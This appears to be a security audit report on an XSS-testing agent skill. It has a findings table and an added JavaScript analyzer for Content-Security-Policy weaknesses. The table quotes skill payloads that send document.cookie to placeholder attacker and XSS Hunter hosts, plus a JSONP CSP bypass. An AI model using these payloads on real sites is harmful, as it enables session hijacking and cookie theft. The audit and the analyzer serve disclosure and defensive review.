testing-for-xss-vulnerabilities
Tests web applications for XSS vulnerabilities by injecting JavaScript payloads to identify security flaws and potential exploits.
Security score: 45/100
The testing-for-xss-vulnerabilities skill was audited on Jun 13, 2026, and we found 7 security issues across 3 threat categories, including 2 critical. Review the findings below before installing. Every finding points into SKILL.md, the skill's markdown instruction file: the two critical hits match bullet text that lists the functions a CSP `unsafe-eval` source permits, and the external-URL hits match the example exfiltration and blind-XSS payloads the skill tells the tester to use, written against placeholder hosts such as `attacker.com` and `xsshunter.example`. Line 189 is counted twice because two rules matched it. Weigh whether pattern matches on instruction text of this kind justify the score for your use.
Security Issues
| Severity | Source | Finding | Flagged text |
| --- | --- | --- | --- |
| critical | SKILL.md line 111 | Eval function call - arbitrary code execution | - `eval()`, `setTimeout()`, `setInterval()`, `Function()` |
| critical | SKILL.md line 122 | Eval function call - arbitrary code execution | - `unsafe-eval` allows eval() and similar functions |
| low | SKILL.md line 189 | Fetch to external URL | `<img src=x onerror="fetch('https://xsshunter.example/callback?c='+document.cookie)">` |
| low | SKILL.md line 99 | External URL reference | - Use XSS Hunter payloads (`"><script src=https://yourxsshunter.xss.ht></script>`) for blind stored XSS where the payload fires in an admin panel or internal tool you cannot directly access |
| low | SKILL.md line 125 | External URL reference | - **JSONP bypass**: If CSP allows a domain with JSONP endpoints, use `<script src="https://allowed-domain.com/jsonp?callback=alert(1)"></script>` |
| low | SKILL.md line 127 | External URL reference | - Session hijacking: `<script>new Image().src="https://attacker.com/steal?c="+document.cookie</script>` |
| low | SKILL.md line 189 | External URL reference | `<img src=x onerror="fetch('https://xsshunter.example/callback?c='+document.cookie)">` |
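The findings on SKILL.md lines 122 and 125 concern Content-Security-Policy weaknesses a tester checks for before picking a payload: `unsafe-eval` in the script policy, and allowlisted hosts that may expose JSONP endpoints. The JavaScript below is an added example, not code from the skill or from this audit. It parses a CSP header value, works out the effective script-src (falling back to default-src), flags `unsafe-eval`, `unsafe-inline` without a nonce or hash, and wildcard or `data:` sources, and lists the allowlisted hosts a tester should review for JSONP. The sample policies, host names and nonce value are constructed for the demonstration.

```javascript
// Added example, not part of the audited skill or this audit: a small analyzer
// for the script-src weaknesses the flagged SKILL.md lines describe.
// Sample policies and host names below are constructed for the demonstration.

// Parse a CSP header value into a Map of directive name -> source expressions.
// Browsers honour only the first occurrence of a directive, so a repeated
// directive later in the header is ignored here as well.
function parseCsp(header) {
  const directives = new Map();
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!directives.has(name)) directives.set(name, tokens.slice(1));
  }
  return directives;
}

// script-src falls back to default-src; with neither present, script loading
// is unrestricted and this returns null.
function effectiveScriptSources(directives) {
  if (directives.has('script-src')) return directives.get('script-src');
  if (directives.has('default-src')) return directives.get('default-src');
  return null;
}

// Returns { findings: [{ code, detail }], hostsToReview: [...] }.
// hostsToReview lists the host and scheme sources a tester should check for
// JSONP or other script-returning endpoints, since any of them can be used to
// load attacker-chosen script while staying inside the policy.
function analyzeScriptSrc(header) {
  const sources = effectiveScriptSources(parseCsp(header));
  const findings = [];
  if (sources === null) {
    findings.push({ code: 'unrestricted', detail: 'no script-src or default-src directive' });
    return { findings, hostsToReview: [] };
  }
  // Keywords and hosts are case-insensitive; compare on lowercased copies.
  const lower = sources.map((s) => s.toLowerCase());
  const hasNonceOrHash = lower.some((s) => /^'(nonce-|sha(256|384|512)-)/.test(s));
  const strictDynamic = lower.includes("'strict-dynamic'");

  if (lower.includes("'unsafe-eval'")) {
    findings.push({
      code: 'unsafe-eval',
      detail: 'eval(), Function() and string arguments to setTimeout()/setInterval() are allowed',
    });
  }
  // A nonce or hash makes browsers ignore 'unsafe-inline', so it only counts without one.
  if (lower.includes("'unsafe-inline'") && !hasNonceOrHash) {
    findings.push({
      code: 'unsafe-inline',
      detail: 'inline <script> blocks and event handlers such as onerror are allowed',
    });
  }
  if (lower.includes('*') || lower.includes('data:')) {
    findings.push({ code: 'wildcard', detail: "'*' or data: lets the attacker supply the script source" });
  }
  // With 'strict-dynamic', CSP3 browsers ignore host and scheme sources and trust
  // only nonce/hash-approved scripts (and what those load), so there is no
  // allowlist left to review.
  const hostsToReview = strictDynamic
    ? []
    : sources.filter((s, i) => !lower[i].startsWith("'") && lower[i] !== '*' && lower[i] !== 'data:');
  return { findings, hostsToReview };
}

// Constructed sample policies: one weak, one hardened.
const WEAK_CSP =
  "default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdn.example.com https://api.example.com; img-src *";
const HARDENED_CSP =
  "default-src 'none'; script-src 'nonce-r4nd0mV4lue' 'strict-dynamic'; object-src 'none'; base-uri 'none'";

for (const [label, csp] of [['weak', WEAK_CSP], ['hardened', HARDENED_CSP]]) {
  console.log(label, JSON.stringify(analyzeScriptSrc(csp), null, 2));
}
```

Run it with `node` and compare the two reports: the weak policy yields `unsafe-eval` and `unsafe-inline` findings plus two hosts to check for JSONP, while the nonce-plus-`'strict-dynamic'` policy yields nothing to review. The analyzer only judges the script policy; it says nothing about whether a given host actually serves a JSONP endpoint, which still has to be confirmed by hand.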
Scanned on Jun 13, 2026